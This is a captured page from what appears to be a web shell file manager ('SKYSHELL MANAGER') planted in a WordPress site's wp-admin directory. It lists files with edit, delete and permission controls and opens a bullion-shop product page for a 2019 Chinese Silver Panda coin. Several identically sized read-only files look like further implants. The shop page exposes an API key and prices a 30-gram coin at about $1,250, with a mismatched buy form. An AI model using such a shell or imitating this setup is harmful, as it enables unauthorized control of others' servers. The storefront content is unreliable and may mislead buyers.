📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: silver-panda.php
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Billion Center - Silver Panda</title> <!-- Mobile Specific Meta ================================================== --> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Favicon --> <link rel="shortcut icon" type="image/x-icon" href="images/fav.png" /> <!-- CSS ================================================== --> <!-- Themefisher Icon font --> <link rel="stylesheet" href="nivoslider/themes/default/default.css" type="text/css" media="screen" /> <link rel="stylesheet" href="nivoslider/nivo-slider.css" type="text/css" media="screen" /> <link rel="stylesheet" href="plugins/themefisher-font.v-2/style.css"> <!-- bootstrap.min css --> <link rel="stylesheet" href="plugins/bootstrap/dist/css/bootstrap.min.css"> <!-- Main Stylesheet --> <link rel="stylesheet" href="css/style.css"> <link rel="stylesheet" type="text/css" href="slick-master/slick/slick.css"> <!--<link rel="stylesheet" href="nivo-slider/themes/default/default.css" type="text/css" media="screen" /> <link rel="stylesheet" href="nivo-slider/nivo-slider.css" type="text/css" media="screen" />--> <link rel="stylesheet" type="text/css" href="nivo-slider/slick/slick-theme.css"> <style type="text/css"> html, body { margin: 0; padding: 0; } * { box-sizing: border-box; } .slider { /*width: 50%; margin: 100px auto;*/ } .slick-slide { margin: 0px 20px; } .slick-slide img { width: 75%; text-align: center; margin-left: 10%; } .slick-prev:before, .slick-next:before { color: black; } .slick-slide { transition: all ease-in-out .3s; } .slick-active { opacity: 1; } .slick-current { opacity: 1; } .slick-current:hover{opacity:.5;} /* Style the tab */ .tab { overflow: hidden; border: 1px solid #ccc; background-color: #f1f1f1; } /* Style the buttons that are used to open the tab content */ .tab button { background-color: inherit; float: left; border: none; outline: none; cursor: pointer; padding: 14px 16px; transition: 0.3s; } /* Change background color of buttons on hover */ .tab button:hover { background-color: #ddd; } /* Create an active/current tablink class */ .tab button.active { background-color: #ccc; } /* Style the tab content */ .tabcontent { display: none; padding: 6px 12px; border: 1px solid #ccc; border-top: none; } </style> <script type="text/javascript"> function openCity(evt, cityName) { // Declare all variables var i, tabcontent, tablinks; // Get all elements with class="tabcontent" and hide them tabcontent = document.getElementsByClassName("tabcontent"); for (i = 0; i < tabcontent.length; i++) { tabcontent[i].style.display = "none"; } // Get all elements with class="tablinks" and remove the class "active" tablinks = document.getElementsByClassName("tablinks"); for (i = 0; i < tablinks.length; i++) { tablinks[i].className = tablinks[i].className.replace(" active", ""); } // Show the current tab, and add an "active" class to the button that opened the tab document.getElementById(cityName).style.display = "block"; evt.currentTarget.className += " active"; } </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script type="text/javascript" src="jquery.nivo.slider.js"></script> </head> <body id="body"> <!-- Start Preloader ==================================== --> <div id="preloader"> <div class="preloader"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div> </div> <!-- End Preloader ==================================== --> <!-- Fixed Navigation ==================================== --> <section class="header navigation"> <div class="container"> <div class="row"> <div class="col-md-12"> <nav class="navbar navbar-expand-md"> <a class="navbar-brand" href="index.php"> <img src="images/logo.png" alt="" width="150px"> </a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="tf-ion-android-menu"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav ml-auto" style="margin-left: 55% !important;"> <li class="nav-item"> <a class="nav-link" href="index.php">Home <span class="sr-only">(current)</span></a> </li> <li class="nav-item"> <a class="nav-link" href="gold.php">Gold</a> </li> <li class="nav-item"> <a class="nav-link" href="silver.php">Silver</a> </li> <li class="nav-item active"> <a class="nav-link" href="platinum.php">Platinum</a> </li> <!-- <li class="nav-item"> <a class="nav-link" href="onsale.php">OnSale</a> </li> <li class="nav-item" style="width:120px;"> <a class="nav-link" href="arrivals.php">New Arrivals</a> </li> <li class="nav-item" style="width:100px;"> <a class="nav-link" href="sell.php">Sell To Us</a> </li> <li class="nav-item"> <a class="nav-link" href="charts.php">Charts</a> </li> <li class="nav-item"> <a class="nav-link" href="ira.php">IRA</a> </li> <li class="nav-item" style="width:110px;"> <a class="nav-link" href="salestax.php">Sales Tax</a>--> </li> <li class="nav-item" style="width:120px;"> <a class="nav-link" href="contact.php">Contact Us</a> </li> <!--<li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Pages </a> <div class="dropdown-menu" aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="team.html">Team Page</a> <a class="dropdown-item" href="404.html">404 Page</a> </div> </li>--> </ul> </div> </nav> </div> </div> </div> </section> <!-- Welcome Slider ==================================== <section class="hero-area"> <div class="container"> <div class="row"> <div class="col-12 col-md-6 align-self-center"> <div id="slider" class="nivoSlider"> <img src="images/banner12.jpg" data-thumb="images/banner12.jpg" alt="" /> <!--<img src="images/banner13.jpg" data-thumb="images/banner13.jpg" alt="" title="This is an example of a caption" /> <img src="images/banner14.jpg" data-thumb="images/banner14.jpg" alt="" data-transition="slideInLeft" /> </div> </div> <div class="col-12 col-md-6"> <img src="images/side.webp" title="" alt=""/ style="margin-left:50%;"> </div> <!-- End row </div> <!-- End container <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider(); }); </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script type="text/javascript" src="jquery.nivo.slider.js"></script> </div> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider(); }); </script> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider({ effect: 'random', slices: 15, boxCols: 8, boxRows: 4, animSpeed: 500, pauseTime: 3000, startSlide: 0, directionNav: true, controlNav: true, controlNavThumbs: false, pauseOnHover: true, manualAdvance: false, prevText: 'Prev', nextText: 'Next', randomStart: false, beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, lastSlide: function(){}, afterLoad: function(){} }); }); </script> </section> --> <section class="services section-xs" id="services"> <div class="container" style="height:1400px"> <h2 style="margin-bottom:20px;"> 2019 30 Gram Chinese Silver Panda Coin (BU) </h2> <div class="product-tab-section"> <div class="product-detail-page"> <div id="tab-container" class="tab-container" data-easytabs="true"> <script>jQuery(document).ready(function(){jQuery('li.description_tab').click();});</script> <!-- Tab content --> <div class="tab"> <button class="tablinks active" onclick="openCity(event, 'Product Details')">Product Details</button> <button class="tablinks" onclick="openCity(event, 'Specifications')">Specifications</button> </div> <div id="Product Details" class="tabcontent" style="display:block"> <div><p itemprop="description">The Chinese Silver Panda is one of the hottest commodities in the silver market. Those who invest in <a href="/silver.php">silver</a> turn to the Chinese Silver Panda for its government-backed purity and the ever-changing design of the Giant Panda on the obverse design field. Right now, 2019 30 Gram Chinese Silver Panda Coins are available to purchase online from billioncenter.</p><p><strong>Coin Highlights:</strong></p><ul><li><strong>Coins arrive inside of individual plastic capsules, mint trays of 15, or boxes of 450 coins!</strong></li><li><strong>34<sup>th</sup> issue of Chinese Silver Panda coins!</strong></li><li>Contains 30 Grams (.9645 Troy oz) of .999 pure silver in BU condition.</li><li>Bears a face value of 10 (Yuan) backed by the government of the Peoples Republic of China.</li><li>On the obverse is the new image of the Giant Panda.</li><li>The reverse includes the view of the Temple of Heavens Hall of Prayer for Abundant Harvests.</li></ul><p>Each of the 2019 30 Gram Chinese Silver Panda Coins issued through this listing today is available in Brilliant Uncirculated condition. The individual coins are housed in protective packaging, while multiples are available in quantities of 15 or 450 coins. The quantities of 15 typically ship in Chinese Mint trays, while multiples of 450 are available in boxes.</p><p>Chinese Silver Panda coins debuted in 1983, but have only been regularly issued in a bullion version since 1989. The 1983-1985 Chinese Silver Pandas were less than 1 Troy oz in weight and had just .900 silver content. No silver coins were issued in 1986. The 1987 coins had an established standard of .999 silver content and 1 Troy oz weight.</p><p>On the obverse of all 2019 30 Gram Chinese Silver Panda Coins is the image of a Giant Panda. This distinctive species of bears is found only in mainland China near the south-central highlands. The bears are distinctive and easy to spot courtesy of their white-and-black fur, with most creatures having black patches of fur around the eyes.</p><p>The reverse side of 2019 30 Gram Chinese Silver Panda coins includes the image of the Hall of Prayer for Abundant Harvests. This building is the largest in the Temple of Heaven complex within Beijing and was constructed between 1406 and 1420. The Temple of Heaven complex itself is one of four major religious complexes in the city constructed by previous emperors.</p> <p>All Chinese Silver Panda coins are now issued, as of 2016, with Grams as the unit of weight rather than Troy ounces. The Chinese Mint issues Silver Panda coins for the Peoples Republic of China and the Peoples Bank of China, but never uses mint marks to denote mint of origin.</p> <p>If you have any questions about these coins, please feel free to contact billioncenter with questions. You can call us at +91 87603 29597, chat with us live online, or simply send us an email with your inquiries.</p></div> </div> <div id="Specifications" class="tabcontent"> <table> <tbody> <tr> <td> Name </td> <td> Silver Panda </td> </tr> <tr> <td> Year </td> <td> 2019 </td> </tr> <tr> <td> Mint Mark </td> <td> Not Shown </td> </tr> <tr> <td> Purity </td> <td> .999 </td> </tr> <tr> <td> Manufacturer </td> <td> People\'s Bank of China </td> </tr> <tr> <td> Diameter </td> <td> 40 mm </td> </tr> <tr> <td> Inner Pack </td> <td> 15 </td> </tr> <tr> <td> Outer Pack </td> <td> 450 </td> </tr> <tr> <td> Denomination </td> <td> 10 </td> </tr> <tr> <td> Condition </td> <td> Brilliant Uncirculated </td> </tr> <tr> <td> Face Value </td> <td> 10 Yuan </td> </tr> <tr> <td> Issuing Country </td> <td> China </td> </tr> <tr> <td> Edge Design </td> <td> Reeded </td> </tr> <tr> <td> Series </td> <td> Chinese Panda </td> </tr> <tr> <td> CoA </td> <td> No </td> </tr> <tr> <td> Mintage </td> <td> 10,000,000 </td> </tr> <tr> <td> Packaging Type </td> <td> Plastic Capsule </td> </tr> <tr> <td> Weight </td> <td> .9645 Troy Ounce </td> </tr> <tr> <td> Shipping </td> <td> Free Shipping on Orders Over $99 </td> </tr> </tbody> </table> </div> <script> function openCity(evt, cityName) { var i, tabcontent, tablinks; tabcontent = document.getElementsByClassName("tabcontent"); for (i = 0; i < tabcontent.length; i++) { tabcontent[i].style.display = "none"; } tablinks = document.getElementsByClassName("tablinks"); for (i = 0; i < tablinks.length; i++) { tablinks[i].className = tablinks[i].className.replace(" active", ""); } document.getElementById(cityName).style.display = "block"; evt.currentTarget.className += " active"; } </script> </div> </div> </div> <img src="images/Silver-Panda.jpg" title="" alt="" style="float:right;width:25%"> <div class="payment-section"> <div class="payment-inner"> <table cellspacing="0" style="width:373px;"> <thead> <tr> <th>Qty</th> <th>ACH/Check/Wire</th> <th>Bitcoin</th> <th>Card/PayPal</th> </tr> </thead> <tbody> <tr> <td> 1+ </td> <td> $1,249.99 </td> <td> $1,263.01 </td> <td> $1,302.07 </td> </tr> </tbody> </table> <div class="add-to-cart"><form action="/2019-1-oz-canadian-gold-moose-coin/?add-to-cart=2242459" class="cartform" method="post" enctype="multipart/form-data"></form><button type="submit" class="add main-btn button addToCart" id="2242459"><span>Buy Now</span></button></div> </div> </div> </div> </section> <!-- End section --> <!-- Tab links --> </div> </div> </div> <footer id="footer" class="bg-one"> <div class="top-footer"> <div class="container"> <div class="row"> <div class="col-sm-3 col-md-3 col-lg-3"> <h3>About Us</h3> <p>Billion Center offers a vast array of gold, silver, platinum products. With an average inventory carry in the tens of millions, we are able to sell in-stock items only and satisfy even the largest of clients.</p> [<a href="about.php" class="about-us">Read More</a>]</p> </div> <!-- End of .col-sm-3 --> <div class="col-sm-3 col-md-3 col-lg-3"> <h3>Quick Links</h3> <ul> <li><a href="about.php">About Us</a></li> <li><a href="gold.php">Gold </a></li> <li><a href="silver.php">Silver</a></li> <li><a href="platinum.php">Platinum</a></li> </ul> </div> <div class="col-sm-3 col-md-3 col-lg-3"> <h3>Information</h3> <ul> <li><a href="privacy-policy.php">Privacy Policy</a></li> <li><a href="termsandconditions.php">Terms and Conditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">unsubscribe</a></li> </ul> </div> <!-- End of .col-sm-3 --> <!-- End of .col-sm-3 --> <div class="col-sm-3 col-md-3 col-lg-3"> <h3>Our Contact</h3> <p>No 9, Rajagopal street,<br> West Tambaram,<br> Chennai, Tamil Nadu 600045</p> </div> <!-- End of .col-sm-3 --> </div> </div> <!-- end container --> </div> <div class="footer-bottom"> <h5>Copyright ©2025. All rights reserved.</h5> </div> </footer> <!-- end footer --> <!-- end Footer Area ========================================== --> <!-- Essential Scripts =====================================--> <!-- Main jQuery --> <script src="plugins/jquery/dist/jquery.min.js"></script> <!-- Bootstrap 3.7 --> <script src="plugins/bootstrap/dist/js/popper.min.js"></script> <script src="plugins/bootstrap/dist/js/bootstrap.min.js"></script> <!-- Owl Carousel --> <script src="plugins/slick-carousel/slick/slick.min.js"></script> <script src="https://cdn.plot.ly/plotly-latest.min.js"></script> <script> var trace1 = { x: [1, 2, 3, 4], y: [10, 15, 13, 17], type: 'scatter' }; var trace2 = { x: [1, 2, 3, 4], y: [16, 5, 11, 9], type: 'scatter' }; var data = [trace1, trace2]; Plotly.newPlot('myDiv', data); </script> <!-- Smooth Scroll js --> <script src="plugins/smooth-scroll/dist/js/smooth-scroll.min.js"></script> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCC72vZw-6tGqFyRhhg5CkF2fqfILn2Tsw"></script> <!-- Custom js --> <script src="js/script.js"></script> <script src="./slick/slick.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> $(document).on('ready', function() { $(".vertical-center-4").slick({ dots: true, vertical: true, centerMode: true, slidesToShow: 4, slidesToScroll: 2 }); $(".vertical-center-3").slick({ dots: true, vertical: true, centerMode: true, slidesToShow: 3, slidesToScroll: 3 }); $(".vertical-center-2").slick({ dots: true, vertical: true, centerMode: true, slidesToShow: 2, slidesToScroll: 2 }); $(".vertical-center").slick({ dots: true, vertical: true, centerMode: true, }); $(".vertical").slick({ dots: true, vertical: true, slidesToShow: 3, slidesToScroll: 3 }); $(".regular").slick({ dots: true, infinite: true, slidesToShow: 3, slidesToScroll: 3 }); $(".center").slick({ dots: true, infinite: true, centerMode: true, slidesToShow: 5, slidesToScroll: 3 }); $(".variable").slick({ dots: true, infinite: true, variableWidth: true }); $(".lazy").slick({ lazyLoad: 'ondemand', // ondemand progressive anticipated infinite: true }); }); </script> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider({ effect: 'random', slices: 15, boxCols: 8, boxRows: 4, animSpeed: 500, pauseTime: 3000, startSlide: 0, directionNav: true, controlNav: true, controlNavThumbs: false, pauseOnHover: true, manualAdvance: false, prevText: 'Prev', nextText: 'Next', randomStart: false, beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, lastSlide: function(){}, afterLoad: function(){} }); }); </script> </body> </html>
Save